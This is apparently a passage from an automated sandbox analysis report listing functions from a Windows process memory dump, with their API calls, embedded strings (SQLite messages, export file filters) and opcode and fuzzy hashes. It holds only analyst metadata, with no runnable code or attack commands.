                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D5D6, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintfwcscpy
                                • String ID: dialog_%d$general$menu_%d$strings
                                • API String ID: 999028693-502967061
                                • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408D96, Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memsetstrlen
                                • String ID:
                                • API String ID: 2350177629-0
                                • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042ADCD, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset
                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                • API String ID: 2221118986-1606337402
                                • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408F2F, Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 265355444-0
                                • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C3C3, Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                • memset.MSVCRT ref: 0040C439
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                • _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                • memset.MSVCRT ref: 0040C4D0
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                • String ID:
                                • API String ID: 1973883786-0
                                • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004116DD, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004116FF
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2618321458-3614832568
                                • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004185CA, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004185FC
                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@AttributesFilememset
                                • String ID:
                                • API String ID: 776155459-0
                                • Opcode ID: d685fede4ad05906408a7f39315eb13a14c9e517c365a31a301be47dc6ccaad7
                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                • Opcode Fuzzy Hash: d685fede4ad05906408a7f39315eb13a14c9e517c365a31a301be47dc6ccaad7
                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004174F5, Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                • malloc.MSVCRT ref: 00417524
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                • String ID:
                                • API String ID: 2308052813-0
                                • Opcode ID: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                • Opcode Fuzzy Hash: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418197, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PathTemp$??3@
                                • String ID: %s\etilqs_$etilqs_
                                • API String ID: 1589464350-1420421710
                                • Opcode ID: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                • Opcode Fuzzy Hash: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FD9E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040FDD5
                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 0040FE1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 1775345501-2769808009
                                • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414770, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                Download Yara Rule
                                APIs
                                • wcscpy.MSVCRT ref: 0041477F
                                • wcscpy.MSVCRT ref: 0041479A
                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscpy$CloseCreateFileHandle
                                • String ID: General
                                • API String ID: 999786162-26480598
                                • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040973C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                • _snwprintf.MSVCRT ref: 0040977D
                                • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLastMessage_snwprintf
                                • String ID: Error$Error %d: %s
                                • API String ID: 313946961-1552265934
                                • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00435A61, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: foreign key constraint failed$new$oid$old
                                • API String ID: 0-1953309616
                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00431671, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                • API String ID: 3510742995-272990098
                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004087B3, Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004087D6
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                • memset.MSVCRT ref: 00408828
                                • memset.MSVCRT ref: 00408840
                                • memset.MSVCRT ref: 00408858
                                • memset.MSVCRT ref: 00408870
                                • memset.MSVCRT ref: 00408888
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                • String ID:
                                • API String ID: 2911713577-0
                                • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044A6E0, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset
                                • String ID: gj
                                • API String ID: 1297977491-4203073231
                                • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E946, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 8129eb809cb666599babc2fdefdd7344b92293add614f2139e14faf7f1e5b1bc
                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                • Opcode Fuzzy Hash: 8129eb809cb666599babc2fdefdd7344b92293add614f2139e14faf7f1e5b1bc
                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041748F, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                • malloc.MSVCRT ref: 004174BD
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                • String ID:
                                • API String ID: 2903831945-0
                                • Opcode ID: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                • Opcode Fuzzy Hash: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D441, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(?), ref: 0040D453
                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445093, Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
